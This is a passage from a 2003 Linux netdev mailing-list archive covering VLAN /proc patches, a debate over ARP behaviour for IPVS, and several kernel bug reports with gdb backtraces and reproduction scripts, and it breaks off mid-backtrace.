cnt, "%s", term_msg); - return cnt; - } - } - - cnt += sprintf(buf + cnt, "EGRESSS priority Mappings: "); - + seq_printf(seq, "EGRESSS priority Mappings: "); for (i = 0; i < 16; i++) { - mp = dev_info->egress_priority_map[i]; + const struct vlan_priority_tci_mapping *mp + = dev_info->egress_priority_map[i]; while (mp) { - cnt += sprintf(buf + cnt, "%lu:%hu ", - mp->priority, ((mp->vlan_qos >> 13) & 0x7)); - - if ((cnt + 100) > VLAN_PROC_BUFSZ) { - if ((cnt + strlen(term_msg)) >= VLAN_PROC_BUFSZ) { - /* should never get here */ - return cnt; - } else { - cnt += sprintf(buf + cnt, "%s", term_msg); - return cnt; - } - } + seq_printf(seq, "%lu:%hu ", + mp->priority, ((mp->vlan_qos >> 13) & 0x7)); mp = mp->next; } } + seq_puts(seq, "\n"); - cnt += sprintf(buf + cnt, "\n"); - - return cnt; + return 0; } diff -Nru a/net/8021q/vlanproc.h b/net/8021q/vlanproc.h --- a/net/8021q/vlanproc.h Mon Jul 28 15:28:36 2003 +++ b/net/8021q/vlanproc.h Mon Jul 28 15:28:36 2003 @@ -3,12 +3,9 @@ #ifdef CONFIG_PROC_FS int vlan_proc_init(void); - void vlan_proc_rem_dev(struct net_device *vlandev); int vlan_proc_add_dev (struct net_device *vlandev); void vlan_proc_cleanup (void); - -#define VLAN_PROC_BUFSZ (4096) /* buffer size for printing proc info */ #else /* No CONFIG_PROC_FS */ From ja@ssi.bg Mon Jul 28 15:36:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 15:36:37 -0700 (PDT) Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SMaPFl030152 for ; Mon, 28 Jul 2003 15:36:28 -0700 Received: from localhost (IDENT:ja@localhost [127.0.0.1]) by u.domain.uli (8.11.6/8.11.6) with ESMTP id h6SMaWk01918; Tue, 29 Jul 2003 01:36:32 +0300 Date: Tue, 29 Jul 2003 01:36:32 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@u.domain.uli To: "David S. Miller" cc: netdev@oss.sgi.com, , Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-Reply-To: <20030727183547.784b6ab5.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4354 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Sun, 27 Jul 2003, David S. Miller wrote: > It would be really nice if people might consider that it could even be > possible to make things like the IPVS layer install the appropriate > NETFILTER_ARP chain rules when the IPVS configuration installed dictates > that one is needed. This is not a kernel job > People using IPVS wouldn't even need to do _ANYTHING_ if IPVS were > to do that. Only if IPVS runs on these boxes, not always true. > And all of that would be _FINE_ because like ARP netfilter, IPVS lies > inside of netfilter where such things which change networking behavior > semantics radically belong. This is good assumption but as usually the world is not perfect. First, the shared IPs should be used only for IPVS talks. With so many places in the kernel calling inet_select_addr() I do not think "hidden" should be blamed to add explicit checks into the IP layer. This is a better safe than sorry situation. Thank Alexey for the added checks. Second, arp_filter is useless for filtering of our announcements and thus for IPVS setups. Also, ARP has never used preferred source addresses. I have a patch for this but I consider it incorrect. So, prefsrc does not play here too. The prefsrc is used only from the IP Layer when the originating connections demand autobind. They are not used for incoming connections. With rp_filter=0 and arp_filter=1 the ARP can easily announce local IPs on the wrong interface. arp_filter can not stop that. So, for IPVS setups the only valid solutions are: - hidden (patch) - arptables (needs recent kernels and/or patch) - iparp (patch) We have only patches. I assume the things will change only when the people see that arptables is working. Then they will need time to adopt their clusters to the new tools. I hope that will happen in 2.6 and we will stop talking about hidden. BTW, would you consider iparp for kernel inclusion? I know it is duplicated work, just asking?: http://www.ssi.bg/~ja/#iparp Some rules (in response to other posts): - the shared IPs have ARP requirements (obvious to everyone) - the shared IPs have IP requirements (autobinding to shared IPs and their ports should be prohibited, with rules or with policy as in the case with "hidden"). Even explicit binding to such IPs can be prohibited. Do we need iptables hooks for denying autobind for some IPs? As for, ARP and the RFCs, the RFCs are free enough to allow ip-to-hwaddr lookups and announcements. All the other requirements we have can be solved with ARP filters: - dropping incoming probes - fixing our announcements (eg. one IP announced only through specific interface, etc) - proxy arp answering - deciding what to put in ARP cache dropping probes, fixing announcements, all is part of the game. We should be able to do everything on our LAN as long as the upper layers are happy with the ARP service and there is sane and well defined behavior. There are defaults for usual setups known to the RFC authors and there are knobs to make Linux more powerful. Regards -- Julian Anastasov From davem@redhat.com Mon Jul 28 16:30:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 16:30:36 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SNUIFl001095 for ; Mon, 28 Jul 2003 16:30:21 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA30636; Mon, 28 Jul 2003 16:27:07 -0700 Date: Mon, 28 Jul 2003 16:27:07 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: greearb@candelatech.com, vlan@wanfear.com, netdev@oss.sgi.com Subject: Re: [PATCH] typo in vlan debug code Message-Id: <20030728162707.1ca4e321.davem@redhat.com> In-Reply-To: <20030728151745.54123f45.shemminger@osdl.org> References: <20030728151745.54123f45.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4355 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 15:17:45 -0700 Stephen Hemminger wrote: > VLAN won't build with debug enabled. Applied to both 2.4.x and 2.5.x, thanks Stephen. From davem@redhat.com Mon Jul 28 16:31:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 16:31:40 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SNVaFl001352 for ; Mon, 28 Jul 2003 16:31:36 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA30653; Mon, 28 Jul 2003 16:28:24 -0700 Date: Mon, 28 Jul 2003 16:28:24 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: greearb@candelatech.com, vlan@wanfear.com, netdev@oss.sgi.com Subject: Re: [PATCH] Vlan convert stubs to no-ops Message-Id: <20030728162824.47f16322.davem@redhat.com> In-Reply-To: <20030728152114.02a10f4e.shemminger@osdl.org> References: <20030728152114.02a10f4e.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4356 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 15:21:14 -0700 Stephen Hemminger wrote: > When building without /proc, the interfaces can be converted to no-ops > (very minor code savings). Applied to 2.6.x, thanks Stephen. From davem@redhat.com Mon Jul 28 16:34:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 16:34:15 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SNYBFl001906 for ; Mon, 28 Jul 2003 16:34:12 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id QAA30684; Mon, 28 Jul 2003 16:31:00 -0700 Date: Mon, 28 Jul 2003 16:31:00 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: greearb@candelatech.com, vlan@wanfear.com, netdev@oss.sgi.com Subject: Re: [PATCH] convert VLAN to use seq_file for /proc Message-Id: <20030728163100.7b47ed5e.davem@redhat.com> In-Reply-To: <20030728153024.6b1d7cde.shemminger@osdl.org> References: <20030728153024.6b1d7cde.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4357 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 28 Jul 2003 15:30:24 -0700 Stephen Hemminger wrote: > Use seq_file interface for smaller, simpler, safer code in /proc. > Output format is the same. > > Patch for 2.6.0-test2 with earlier proc patches Applied to 2.6.x, thanks Stephen. From davidsen@tmr.com Mon Jul 28 19:59:15 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 19:59:20 -0700 (PDT) Received: from gatekeeper.tmr.com (tmr-02.dsl.thebiz.net [216.238.38.204]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T2xDFl015643 for ; Mon, 28 Jul 2003 19:59:14 -0700 Received: from localhost (davidsen@localhost) by gatekeeper.tmr.com (8.9.0/8.9.0) with SMTP id WAA21198; Mon, 28 Jul 2003 22:51:00 -0400 Date: Mon, 28 Jul 2003 22:51:00 -0400 (EDT) From: Bill Davidsen To: "David S. Miller" cc: Carlos Velasco , bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-Reply-To: <20030727164649.517b2b88.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4358 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidsen@tmr.com Precedence: bulk X-list: netdev On Sun, 27 Jul 2003, David S. Miller wrote: > On Mon, 28 Jul 2003 01:40:47 +0200 > "Carlos Velasco" wrote: > > > I stepped into the same problems you have reported here. > > No, your problem was completely different. > > > There's a feature to do linux to behave like other OS and systems, called "hidden". > > WRONG! People please stop this misinformation already. > > Bas's problem can be solved by him giving a "preferred source" > to each of his IPV4 routes and setting the "arpfilter" sysctl > variable for his devices to "1". You say this with total disregard for the fact that in actual practice it only works for static routes. If you get a new connection it does not by magic make an entry in the route table to go back out of the NIC with the matching source IP, doing a "solution" with routing needs a route for every destination (host or CIDR block). Doing a "solution" with source routing works if you have a small number of source IPs. However the number of routes is limited (252??) and again the convenience factor of having the right information added with the route addition is "do it by hand or write your own software." > > This particular case has been discussed to death in the past > and I really recommend people read up there before dragging this > out further. It will keep coming back because it's a real problem. I do agree that the hidden patch is not the desired way to solve the problem, but until there is a reasonable (not requiring a guru or large manual effort) solution people will keep bringing it up. You have stated that this is required by some RFC. I can see that the RFC *allows* this behaviour, but I think there are a very small number of people who believe that current 2.6 behaviour is better than doing what most of the other o/s vandors have done. Feel free to quote the RFC saying it must be done the way it is and at least some of us will stop mentioning the problem. I believe you were the one who said that my "require source IP on NIC" patch (2.4.16) was non-compliant, but I don't quite see that either. It didn't prevent accepting a packet on one NIC which matched an address on another, but it did prevent packets from going out if the source address was not on the NIC. The incoming seems to be a minor problem, since there should *be* no incoming packets if arp-filter is on. It didn't have a /proc interface, either, but that's a nit-pick, it could be added. I would hope that you would either quote the RFC other vendors are violating, or stop repeating "the hidden patch is bad" and start saying "here is another convienient solution." As in one which can be set in a single place and which will send packets out of a NIC with the matching source address, similar to the behaviour of other implementations. -- bill davidsen CTO, TMR Associates, Inc Doing interesting things with little computers since 1979. From akpm@osdl.org Mon Jul 28 20:46:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 20:46:19 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T3k9Fl016387 for ; Mon, 28 Jul 2003 20:46:09 -0700 Received: from mnm (build.pdx.osdl.net [172.20.1.2]) by mail.osdl.org (8.11.6/8.11.6) with ESMTP id h6T3k0I05170; Mon, 28 Jul 2003 20:46:00 -0700 Date: Mon, 28 Jul 2003 20:46:15 -0700 From: Andrew Morton To: Burton Windle Cc: netdev@oss.sgi.com Subject: Re: [Bugme-new] [Bug 937] New: Oops in raw_rcv_skb while ping flooding Message-Id: <20030728204615.7c92d413.akpm@osdl.org> In-Reply-To: References: <20030727202514.5b4b2ba9.akpm@osdl.org> X-Mailer: Sylpheed version 0.9.4 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4359 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@osdl.org Precedence: bulk X-list: netdev Burton Windle wrote: > > Still happens with 2.6.0-test2. > > CONFIG_DEBUG_KERNEL=y > CONFIG_DEBUG_STACKOVERFLOW=y > CONFIG_DEBUG_SLAB=y > CONFIG_DEBUG_IOVIRT=y > CONFIG_MAGIC_SYSRQ=y > CONFIG_DEBUG_SPINLOCK=y > CONFIG_DEBUG_PAGEALLOC=y > CONFIG_DEBUG_SPINLOCK_SLEEP=y > CONFIG_FRAME_POINTER=y yeah, me too. The sending machine is a 4-way x86. I run ping -f otherhost & ping -f otherhost & and it oopses immediately: Program received signal SIGEMT, Emulation trap. 0xc036f40d in raw_rcv_skb (sk=0xf57cc004, skb=0xf3772004) at include/net/sock.h:942 942 sk->sk_data_ready(sk, skb->len); (gdb) p skb->len Cannot access memory at address 0xf3772068 (gdb) bt #0 0xc036f40d in raw_rcv_skb (sk=0xf57cc004, skb=0xf3772004) at include/net/sock.h:942 #1 0xc036f515 in raw_rcv (sk=0xf57cc004, skb=0xf3772004) at net/ipv4/raw.c:255 #2 0xc036f0bc in raw_v4_input (skb=0xf377b004, iph=0xf6a99024, hash=0) at net/ipv4/raw.c:169 #3 0xc034d9b9 in ip_local_deliver_finish (skb=0xf377b004) at net/ipv4/ip_input.c:234 #4 0xc0344968 in nf_hook_slow (pf=2, hook=1, skb=0xf377b004, indev=0xf70b7004, outdev=0x0, okfn=0xc034d914 , hook_thresh=-2147483648) at net/core/netfilter.c:539 #5 0xc034d48a in ip_local_deliver (skb=0xf377b004) at net/ipv4/ip_input.c:285 #6 0xc034dcee in ip_rcv_finish (skb=0xf377b004) at net/ipv4/ip_input.c:349 #7 0xc0344968 in nf_hook_slow (pf=2, hook=0, skb=0xf377b004, indev=0xf70b7004, outdev=0x0, okfn=0xc034daf4 , hook_thresh=-2147483648) at net/core/netfilter.c:539 #8 0xc034d8c0 in ip_rcv (skb=0xf377b004, dev=0x0, pt=0xc04afd60) at net/ipv4/ip_input.c:424 #9 0xc033c19b in netif_receive_skb (skb=0xf377b004) at net/core/dev.c:1596 #10 0xc033c27f in process_backlog (backlog_dev=0xc3857a50, budget=0xc05bbf40) at net/core/dev.c:1630 #11 0xc033c3be in net_rx_action (h=0xc05b7d98) at net/core/dev.c:1695 #12 0xc01289cb in do_softirq () at kernel/softirq.c:100 #13 0xc010d516 in do_IRQ (regs= {ebx = -1067737088, ecx = -1067737088, edx = -1067737088, esi = -1072657448, edi = -1072672768, ebp = -1067728960, eax = 16, xds = -1072693125, xes = 123, orig_eax = -218, eip = -1072657404, xcs = 96, eflags = 582, esp = -1067728944, xss = -1072657306}) at arch/i386/kernel/irq.c:500 #14 0xc010b8fc in common_interrupt () #15 0xc0108c66 in cpu_idle () at arch/i386/kernel/process.c:146 #16 0xc010507c in rest_init () at init/main.c:374 #17 0xc05bc7dc in start_kernel () at init/main.c:466 The critical thing here is CONFIG_DEBUG_PAGEALLOC (I have all debug options turned on). The memory at *skb has been freed and unmapped. Looks like a use-after-free bug. Now it _might_ be a bug in CONFIG_DEBUG_PAGEALLOC. I'm not sure that I'm 100% confident in it yet. But it hits so quickly that I rather doubt it. From lamont@scriptkiddie.org Mon Jul 28 21:48:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 21:49:02 -0700 (PDT) Received: from warez.scriptkiddie.org (uswest-dsl-142-38.cortland.com [209.162.142.38]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T4msFl017434 for ; Mon, 28 Jul 2003 21:48:55 -0700 Received: from [192.168.69.11] (unknown [192.168.69.11]) by warez.scriptkiddie.org (Postfix) with ESMTP id DF71462D1A; Mon, 28 Jul 2003 21:48:52 -0700 (PDT) Date: Mon, 28 Jul 2003 21:48:52 -0700 (PDT) From: Lamont Granquist To: Bill Davidsen Cc: "David S. Miller" , Carlos Velasco , bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-Reply-To: Message-ID: <20030728213933.F81299@coredump.scriptkiddie.org> References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4360 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lamont@scriptkiddie.org Precedence: bulk X-list: netdev On Mon, 28 Jul 2003, Bill Davidsen wrote: > On Sun, 27 Jul 2003, David S. Miller wrote: > > This particular case has been discussed to death in the past > > and I really recommend people read up there before dragging this > > out further. > > It will keep coming back because it's a real problem. I do agree that the > hidden patch is not the desired way to solve the problem, but until there > is a reasonable (not requiring a guru or large manual effort) solution > people will keep bringing it up. And it severely violates the principle of least surprise. Its unfortunate that this principle isn't more widely discussed and considered on lkml. From anton@samba.org Mon Jul 28 23:05:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 23:05:50 -0700 (PDT) Received: from lists.samba.org (dp.samba.org [66.70.73.150]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T65jFl020825 for ; Mon, 28 Jul 2003 23:05:45 -0700 Received: by lists.samba.org (Postfix, from userid 504) id 929C52C0C7; Tue, 29 Jul 2003 06:05:44 +0000 (GMT) Date: Tue, 29 Jul 2003 16:05:09 +1000 From: Anton Blanchard To: netdev@oss.sgi.com Cc: miltonm@bga.com Subject: [PATCH] fix NAPI race Message-ID: <20030729060509.GB13227@krispykreme> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.4i X-archive-position: 4361 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: anton@samba.org Precedence: bulk X-list: netdev Hi, Milton and I debugged an oops where we did list_del on a poisoned list entry. It turns out there is nothing to order between list_del on poll_list and the clear_bit that serialises list_add. Anton diff -ruN --exclude-from=exclude gr13_work/include/linux/netdevice.h gr13_work_miltonm/include/linux/netdevice.h --- gr13_work/include/linux/netdevice.h 2003-07-17 23:30:43.000000000 -0500 +++ gr13_work_miltonm/include/linux/netdevice.h 2003-07-28 23:42:06.000000000 -0500 @@ -820,6 +820,7 @@ local_irq_save(flags); if (!test_bit(__LINK_STATE_RX_SCHED, &dev->state)) BUG(); list_del(&dev->poll_list); + smp_mb__before_clear_bit(); clear_bit(__LINK_STATE_RX_SCHED, &dev->state); local_irq_restore(flags); } diff -ruN --exclude-from=exclude gr13_work/net/core/dev.c gr13_work_miltonm/net/core/dev.c --- gr13_work/net/core/dev.c 2003-07-17 23:30:43.000000000 -0500 +++ gr13_work_miltonm/net/core/dev.c 2003-07-28 23:40:15.000000000 -0500 @@ -1657,6 +1657,7 @@ *budget -= work; list_del(&backlog_dev->poll_list); + smp_mb__before_clear_bit(); clear_bit(__LINK_STATE_RX_SCHED, &backlog_dev->state); if (queue->throttle) { diff -ruN --exclude-from=exclude gr13_work/drivers/net/tg3.c gr13_work_miltonm/drivers/net/tg3.c --- gr13_work/drivers/net/tg3.c 2003-07-13 23:40:19.000000000 -0500 +++ gr13_work_miltonm/drivers/net/tg3.c 2003-07-29 01:00:32.000000000 -0500 @@ -250,6 +250,7 @@ { if (!test_bit(__LINK_STATE_RX_SCHED, &dev->state)) BUG(); list_del(&dev->poll_list); + smp_mb__before_clear_bit(); clear_bit(__LINK_STATE_RX_SCHED, &dev->state); } From anton@samba.org Tue Jul 29 00:43:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 00:43:34 -0700 (PDT) Received: from lists.samba.org (dp.samba.org [66.70.73.150]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T7hEFl028851 for ; Tue, 29 Jul 2003 00:43:15 -0700 Received: by lists.samba.org (Postfix, from userid 504) id 33A9E2C07C; Tue, 29 Jul 2003 06:56:01 +0000 (GMT) Date: Tue, 29 Jul 2003 16:53:07 +1000 From: Anton Blanchard To: "David S. Miller" Cc: davidm@hpl.hp.com, davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter Message-ID: <20030729065307.GC13227@krispykreme> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20030714223822.23b78f9b.davem@redhat.com> User-Agent: Mutt/1.5.4i X-archive-position: 4362 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: anton@samba.org Precedence: bulk X-list: netdev Hi, > > So we get almost 15% of throughput drop. This was with plain "netkit > > fptd". AFAIK, it does a simple read/write loop (not sendfile()). We've been seeing rather variable results for TSO as well. With TSO off netperf TCP_STREAM will hit line speed and stay there. With TSO on some runs will hit line speed and others will be about 100Mbit/sec slower. > When we use TSO for non-sendfile() applications it really > stresses memory allocations. We do these 64K+ kmalloc()'s > for each packet we construct. Yep we definitely noticed much more higher allocations when watching /proc/slab. Playing around with slab tuning didnt seem to help. Anton From akpm@osdl.org Tue Jul 29 01:32:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 01:32:43 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6T8WQFl031007 for ; Tue, 29 Jul 2003 01:32:27 -0700 Received: from mnm (build.pdx.osdl.net [172.20.1.2]) by mail.osdl.org (8.11.6/8.11.6) with ESMTP id h6T8WHI22007; Tue, 29 Jul 2003 01:32:18 -0700 Date: Tue, 29 Jul 2003 01:32:34 -0700 From: Andrew Morton To: Christian Mautner Cc: netdev@oss.sgi.com, Stephen Hemminger Subject: Re: kernel BUG at kernel/timer.c:380! Message-Id: <20030729013234.59c9f78b.akpm@osdl.org> In-Reply-To: <20030719022525.GA18446@mautner.ca> References: <20030719022525.GA18446@mautner.ca> X-Mailer: Sylpheed version 0.9.4 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4363 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@osdl.org Precedence: bulk X-list: netdev Christian Mautner wrote: > > I have a very reproducible problem with 2.6.0-test1. Been looking into this bug in the bridge driver a little more. The problem is that we keep on calling br_stp_port_timer_init() against the bridge. But this does init_timer() against the bridge's timers, even though they are already running from the previous call. The init_timer() on a pending timer sets timer->base to NULL and we oops when the timer code tries to cascade the timers. Here's the script: #!/bin/sh doit() { echo $* $* } doit brctl addbr br0 doit brctl stp br0 off doit brctl addif br0 eth1 doit brctl addif br0 eth2 doit ifconfig eth1 up doit ifconfig eth2 up doit ifconfig br0 up And here's the result with a breakpoint on entry to br_stp_port_timer_init(): addif br0 eth1: Breakpoint 1, br_stp_port_timer_init (p=0xf4c1f004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf4c1f004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf4c1f004) at net/bridge/br_stp_if.c:37 #2 0xc0393d5b in new_nbp (br=0xf370c240, dev=0xf56e2004) at net/bridge/br_if.c:157 #3 0xc0393eae in br_add_if (br=0xf370c240, dev=0xf56e2004) at net/bridge/br_if.c:221 #4 0xc039450d in br_ioctl_device (br=0xf370c240, cmd=4, arg0=4, arg1=0, arg2=4106350596) at net/bridge/br_ioctl.c:64 #5 0xc0394fac in br_ioctl (br=0xf4c1f004, cmd=4, arg0=4, arg1=0, arg2=4106350596) at net/bridge/br_ioctl.c:306 #6 0xc03929e0 in br_dev_do_ioctl (dev=0xf4c1f004, rq=0xf4c1f004, cmd=35312) at net/bridge/br_device.c:35 #7 0xc0338e05 in dev_ifsioc (ifr=0xf3663f48, cmd=35312) at net/core/dev.c:2375 #8 0xc033910e in dev_ioctl (cmd=35312, arg=0xbffff970) at net/core/dev.c:2538 #9 0xc032fff8 in sock_ioctl (inode=0xf4f6f030, file=0xf5b3b004, cmd=35312, arg=3221223792) at net/socket.c:771 #10 0xc017376f in sys_ioctl (fd=3, cmd=35312, arg=4109824004) at fs/ioctl.c:127 (gdb) c Continuing. addif br0 eth2: Breakpoint 1, br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf3645004) at net/bridge/br_stp_if.c:37 #2 0xc0393d5b in new_nbp (br=0xf370c240, dev=0xf5d76004) at net/bridge/br_if.c:157 #3 0xc0393eae in br_add_if (br=0xf370c240, dev=0xf5d76004) at net/bridge/br_if.c:221 #4 0xc039450d in br_ioctl_device (br=0xf370c240, cmd=4, arg0=5, arg1=0, arg2=4083437572) at net/bridge/br_ioctl.c:64 #5 0xc0394fac in br_ioctl (br=0xf3645004, cmd=4, arg0=5, arg1=0, arg2=4083437572) at net/bridge/br_ioctl.c:306 #6 0xc03929e0 in br_dev_do_ioctl (dev=0xf3645004, rq=0xf3645004, cmd=35312) at net/bridge/br_device.c:35 #7 0xc0338e05 in dev_ifsioc (ifr=0xf3663f48, cmd=35312) at net/core/dev.c:2375 #8 0xc033910e in dev_ioctl (cmd=35312, arg=0xbffff970) at net/core/dev.c:2538 #9 0xc032fff8 in sock_ioctl (inode=0xf35e9030, file=0xf4ca0004, cmd=35312, arg=3221223792) at net/socket.c:771 #10 0xc017376f in sys_ioctl (fd=3, cmd=35312, arg=4083060740) at fs/ioctl.c:127 (gdb) c Continuing. ifup eth1: Breakpoint 1, br_stp_port_timer_init (p=0xf4c1f004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf4c1f004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf4c1f004) at net/bridge/br_stp_if.c:37 #2 0xc03963e5 in br_stp_enable_port (p=0xf4c1f004) at net/bridge/br_stp_if.c:81 #3 0xc0395068 in br_device_event (unused=0xc04ad94c, event=1, ptr=0xf56e2004) at net/bridge/br_notify.c:54 #4 0xc01322be in notifier_call_chain (n=0xf4c1f004, val=1, v=0xf56e2004) at kernel/sys.c:159 #5 0xc0337217 in dev_open (dev=0xf56e2004) at net/core/dev.c:780 #6 0xc0338965 in dev_change_flags (dev=0xf56e2004, flags=4163) at net/core/dev.c:2169 #7 0xc037366e in devinet_ioctl (cmd=35092, arg=0xbffff890) at net/ipv4/devinet.c:624 #8 0xc03763b7 in inet_ioctl (sock=0xf4c1f004, cmd=35092, arg=3221223568) at net/ipv4/af_inet.c:872 #9 0xc0330232 in sock_ioctl (inode=0xf52c5030, file=0xf35d0004, cmd=35092, arg=3221223568) at net/socket.c:830 #10 0xc017376f in sys_ioctl (fd=4, cmd=35092, arg=4113321988) at fs/ioctl.c:127 (gdb) c Continuing. ifup eth2: Breakpoint 1, br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf3645004) at net/bridge/br_stp_if.c:37 #2 0xc03963e5 in br_stp_enable_port (p=0xf3645004) at net/bridge/br_stp_if.c:81 #3 0xc0395068 in br_device_event (unused=0xc04ad94c, event=1, ptr=0xf5d76004) at net/bridge/br_notify.c:54 #4 0xc01322be in notifier_call_chain (n=0xf3645004, val=1, v=0xf5d76004) at kernel/sys.c:159 #5 0xc0337217 in dev_open (dev=0xf5d76004) at net/core/dev.c:780 #6 0xc0338965 in 